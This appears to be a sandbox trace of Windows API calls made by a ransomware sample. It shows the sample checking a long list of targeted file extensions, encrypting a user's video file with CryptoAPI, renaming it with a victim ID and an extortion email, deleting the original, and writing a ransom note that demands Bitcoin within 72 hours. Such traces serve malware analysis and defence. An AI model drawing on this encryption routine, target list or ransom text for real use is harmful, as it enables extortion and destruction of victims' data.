	[0202.233] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.233] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp4") returned=".mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0202.234] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.234] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.234] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0202.305] ReadFile (in: hFile=0x390, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0x11c0b, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x189930*=0x11c0b, lpOverlapped=0x0) returned 1
	[0202.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.309] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcae68) returned 1
	[0202.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.311] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0202.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.312] CryptHashData (hHash=0xfb9370, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0202.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.312] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9370, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb91b0) returned 1
	[0202.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.312] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x11c0b, dwBufLen=0x11c0b | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x11c10) returned 1
	[0202.316] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.316] RtlMoveMemory (in: Destination=0xff2db8, Source=0xfe11a0, Length=0x11c0b | out: Destination=0xff2db8) 
	[0202.316] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.316] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2db8*, pdwDataLen=0x1894dc*=0x11c0b, dwBufLen=0x11c10 | out: pbData=0xff2db8*, pdwDataLen=0x1894dc*=0x11c10) returned 1
	[0202.318] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.319] CryptDestroyKey (hKey=0xfb91b0) returned 1
	[0202.319] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.319] CryptDestroyHash (hHash=0xfb9370) returned 1
	[0202.319] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.319] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0202.319] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.320] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.320] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.320] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0202.321] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 124
	[0202.321] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0202.322] WriteFile (in: hFile=0x32c, lpBuffer=0xff2db8*, nNumberOfBytesToWrite=0x11c10, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xff2db8*, lpNumberOfBytesWritten=0x189938*=0x11c10, lpOverlapped=0x0) returned 1
	[0202.328] CloseHandle (hObject=0x32c) returned 1
	[0202.328] CloseHandle (hObject=0x390) returned 1
	[0202.328] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4")) returned 1
	[0202.336] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4")) returned 0
	[0202.337] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32f53870, ftCreationTime.dwHighDateTime=0x1d971d3, ftLastAccessTime.dwLowDateTime=0xcc5b810, ftLastAccessTime.dwHighDateTime=0x1d9752e, ftLastWriteTime.dwLowDateTime=0xcc5b810, ftLastWriteTime.dwHighDateTime=0x1d9752e, nFileSizeHigh=0x0, nFileSizeLow=0x11c0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LjfQsSpZ60HKke5.mp4", cAlternateFileName="LJFQSS~1.MP4")) returned 0
	[0202.337] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0202.337] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0202.338] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT"
	[0202.338] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*"
	[0202.338] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.338] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.338] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\HELP_DECRYPT_YOUR_FILES.TXT") returned 90
	[0202.338] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0202.339] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0202.339] WriteFile (in: hFile=0x388, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0202.342] CloseHandle (hObject=0x388) returned 1
	[0202.342] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.343] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.343] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0202.344] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0202.344] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0202.344] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0202.345] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0202.345] WriteFile (in: hFile=0x388, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
